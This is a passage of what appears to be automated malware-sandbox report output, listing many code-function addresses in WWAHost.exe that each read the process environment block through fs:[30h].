Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0372131B mov eax, dword ptr fs:[00000030h] 13_2_0372131B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373070D mov eax, dword ptr fs:[00000030h] 13_2_0373070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373070D mov eax, dword ptr fs:[00000030h] 13_2_0373070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368F716 mov eax, dword ptr fs:[00000030h] 13_2_0368F716
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FFF10 mov eax, dword ptr fs:[00000030h] 13_2_036FFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FFF10 mov eax, dword ptr fs:[00000030h] 13_2_036FFF10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h] 13_2_036903E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h] 13_2_036903E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h] 13_2_036903E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h] 13_2_036903E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h] 13_2_036903E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h] 13_2_036903E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A37F5 mov eax, dword ptr fs:[00000030h] 13_2_036A37F5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E53CA mov eax, dword ptr fs:[00000030h] 13_2_036E53CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E53CA mov eax, dword ptr fs:[00000030h] 13_2_036E53CA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694BAD mov eax, dword ptr fs:[00000030h] 13_2_03694BAD
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694BAD mov eax, dword ptr fs:[00000030h] 13_2_03694BAD
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694BAD mov eax, dword ptr fs:[00000030h] 13_2_03694BAD
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03735BA5 mov eax, dword ptr fs:[00000030h] 13_2_03735BA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03671B8F mov eax, dword ptr fs:[00000030h] 13_2_03671B8F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03671B8F mov eax, dword ptr fs:[00000030h] 13_2_03671B8F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371D380 mov ecx, dword ptr fs:[00000030h] 13_2_0371D380
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03678794 mov eax, dword ptr fs:[00000030h] 13_2_03678794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0372138A mov eax, dword ptr fs:[00000030h] 13_2_0372138A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369B390 mov eax, dword ptr fs:[00000030h] 13_2_0369B390
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7794 mov eax, dword ptr fs:[00000030h] 13_2_036E7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7794 mov eax, dword ptr fs:[00000030h] 13_2_036E7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7794 mov eax, dword ptr fs:[00000030h] 13_2_036E7794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692397 mov eax, dword ptr fs:[00000030h] 13_2_03692397
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367766D mov eax, dword ptr fs:[00000030h] 13_2_0367766D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A927A mov eax, dword ptr fs:[00000030h] 13_2_036A927A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371B260 mov eax, dword ptr fs:[00000030h] 13_2_0371B260
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371B260 mov eax, dword ptr fs:[00000030h] 13_2_0371B260
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738A62 mov eax, dword ptr fs:[00000030h] 13_2_03738A62
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h] 13_2_0368AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h] 13_2_0368AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h] 13_2_0368AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h] 13_2_0368AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h] 13_2_0368AE73
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669240 mov eax, dword ptr fs:[00000030h] 13_2_03669240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669240 mov eax, dword ptr fs:[00000030h] 13_2_03669240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669240 mov eax, dword ptr fs:[00000030h] 13_2_03669240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669240 mov eax, dword ptr fs:[00000030h] 13_2_03669240
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h] 13_2_03677E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h] 13_2_03677E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h] 13_2_03677E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h] 13_2_03677E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h] 13_2_03677E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h] 13_2_03677E41
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036F4257 mov eax, dword ptr fs:[00000030h] 13_2_036F4257
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366E620 mov eax, dword ptr fs:[00000030h] 13_2_0366E620
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A4A2C mov eax, dword ptr fs:[00000030h] 13_2_036A4A2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A4A2C mov eax, dword ptr fs:[00000030h] 13_2_036A4A2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371FE3F mov eax, dword ptr fs:[00000030h] 13_2_0371FE3F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h] 13_2_0366C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h] 13_2_0366C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h] 13_2_0366C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03698E00 mov eax, dword ptr fs:[00000030h] 13_2_03698E00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03678A0A mov eax, dword ptr fs:[00000030h] 13_2_03678A0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366AA16 mov eax, dword ptr fs:[00000030h] 13_2_0366AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366AA16 mov eax, dword ptr fs:[00000030h] 13_2_0366AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03683A1C mov eax, dword ptr fs:[00000030h] 13_2_03683A1C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A61C mov eax, dword ptr fs:[00000030h] 13_2_0369A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A61C mov eax, dword ptr fs:[00000030h] 13_2_0369A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036776E2 mov eax, dword ptr fs:[00000030h] 13_2_036776E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036916E0 mov ecx, dword ptr fs:[00000030h] 13_2_036916E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692AE4 mov eax, dword ptr fs:[00000030h] 13_2_03692AE4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692ACB mov eax, dword ptr fs:[00000030h] 13_2_03692ACB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738ED6 mov eax, dword ptr fs:[00000030h] 13_2_03738ED6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036936CC mov eax, dword ptr fs:[00000030h] 13_2_036936CC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A8EC7 mov eax, dword ptr fs:[00000030h] 13_2_036A8EC7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371FEC0 mov eax, dword ptr fs:[00000030h] 13_2_0371FEC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E46A7 mov eax, dword ptr fs:[00000030h] 13_2_036E46A7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h] 13_2_03730EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h] 13_2_03730EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h] 13_2_03730EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0367AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0367AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369FAB0 mov eax, dword ptr fs:[00000030h] 13_2_0369FAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FFE87 mov eax, dword ptr fs:[00000030h] 13_2_036FFE87
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369D294 mov eax, dword ptr fs:[00000030h] 13_2_0369D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369D294 mov eax, dword ptr fs:[00000030h] 13_2_0369D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C962 mov eax, dword ptr fs:[00000030h] 13_2_0366C962
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B171 mov eax, dword ptr fs:[00000030h] 13_2_0366B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B171 mov eax, dword ptr fs:[00000030h] 13_2_0366B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368C577 mov eax, dword ptr fs:[00000030h] 13_2_0368C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368C577 mov eax, dword ptr fs:[00000030h] 13_2_0368C577
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A3D43 mov eax, dword ptr fs:[00000030h] 13_2_036A3D43
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368B944 mov eax, dword ptr fs:[00000030h] 13_2_0368B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368B944 mov eax, dword ptr fs:[00000030h] 13_2_0368B944
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E3540 mov eax, dword ptr fs:[00000030h] 13_2_036E3540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03687D50 mov eax, dword ptr fs:[00000030h] 13_2_03687D50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738D34 mov eax, dword ptr fs:[00000030h] 13_2_03738D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov eax, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03684120 mov ecx, dword ptr fs:[00000030h] 13_2_03684120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h] 13_2_03694D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h] 13_2_03694D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694D3B mov eax, dword ptr fs:[00000030h] 13_2_03694D3B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369513A mov eax, dword ptr fs:[00000030h] 13_2_0369513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369513A mov eax, dword ptr fs:[00000030h] 13_2_0369513A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03673D34 mov eax, dword ptr fs:[00000030h] 13_2_03673D34
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366AD30 mov eax, dword ptr fs:[00000030h] 13_2_0366AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036EA537 mov eax, dword ptr fs:[00000030h] 13_2_036EA537
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669100 mov eax, dword ptr fs:[00000030h] 13_2_03669100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669100 mov eax, dword ptr fs:[00000030h] 13_2_03669100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669100 mov eax, dword ptr fs:[00000030h] 13_2_03669100
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03718DF1 mov eax, dword ptr fs:[00000030h] 13_2_03718DF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0366B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0366B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B1E1 mov eax, dword ptr fs:[00000030h] 13_2_0366B1E1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036F41E8 mov eax, dword ptr fs:[00000030h] 13_2_036F41E8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0367D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367D5E0 mov eax, dword ptr fs:[00000030h] 13_2_0367D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036935A1 mov eax, dword ptr fs:[00000030h] 13_2_036935A1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E69A6 mov eax, dword ptr fs:[00000030h] 13_2_036E69A6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036961A0 mov eax, dword ptr fs:[00000030h] 13_2_036961A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036961A0 mov eax, dword ptr fs:[00000030h] 13_2_036961A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E51BE mov eax, dword ptr fs:[00000030h] 13_2_036E51BE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h] 13_2_03691DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h] 13_2_03691DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03691DB5 mov eax, dword ptr fs:[00000030h] 13_2_03691DB5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692581 mov eax, dword ptr fs:[00000030h] 13_2_03692581
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368C182 mov eax, dword ptr fs:[00000030h] 13_2_0368C182
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A185 mov eax, dword ptr fs:[00000030h] 13_2_0369A185
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03662D8A mov eax, dword ptr fs:[00000030h] 13_2_03662D8A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369FD9B mov eax, dword ptr fs:[00000030h] 13_2_0369FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369FD9B mov eax, dword ptr fs:[00000030h] 13_2_0369FD9B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692990 mov eax, dword ptr fs:[00000030h] 13_2_03692990
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03722073 mov eax, dword ptr fs:[00000030h] 13_2_03722073
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368746D mov eax, dword ptr fs:[00000030h] 13_2_0368746D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03731074 mov eax, dword ptr fs:[00000030h] 13_2_03731074
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A44B mov eax, dword ptr fs:[00000030h] 13_2_0369A44B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03680050 mov eax, dword ptr fs:[00000030h] 13_2_03680050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03680050 mov eax, dword ptr fs:[00000030h] 13_2_03680050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FC450 mov eax, dword ptr fs:[00000030h] 13_2_036FC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FC450 mov eax, dword ptr fs:[00000030h] 13_2_036FC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369002D mov eax, dword ptr fs:[00000030h] 13_2_0369002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369BC2C mov eax, dword ptr fs:[00000030h] 13_2_0369BC2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367B02A mov eax, dword ptr fs:[00000030h] 13_2_0367B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6C0A mov eax, dword ptr fs:[00000030h] 13_2_036E6C0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03734015 mov eax, dword ptr fs:[00000030h] 13_2_03734015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03734015 mov eax, dword ptr fs:[00000030h] 13_2_03734015
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03721C06 mov eax, dword ptr fs:[00000030h] 13_2_03721C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h] 13_2_036E7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h] 13_2_036E7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7016 mov eax, dword ptr fs:[00000030h] 13_2_036E7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373740D mov eax, dword ptr fs:[00000030h] 13_2_0373740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373740D mov eax, dword ptr fs:[00000030h] 13_2_0373740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373740D mov eax, dword ptr fs:[00000030h] 13_2_0373740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_037214FB mov eax, dword ptr fs:[00000030h] 13_2_037214FB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036658EC mov eax, dword ptr fs:[00000030h] 13_2_036658EC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h] 13_2_036E6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h] 13_2_036E6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E6CF0 mov eax, dword ptr fs:[00000030h] 13_2_036E6CF0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738CD6 mov eax, dword ptr fs:[00000030h] 13_2_03738CD6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov ecx, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FB8D0 mov eax, dword ptr fs:[00000030h] 13_2_036FB8D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A90AF mov eax, dword ptr fs:[00000030h] 13_2_036A90AF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036920A0 mov eax, dword ptr fs:[00000030h] 13_2_036920A0
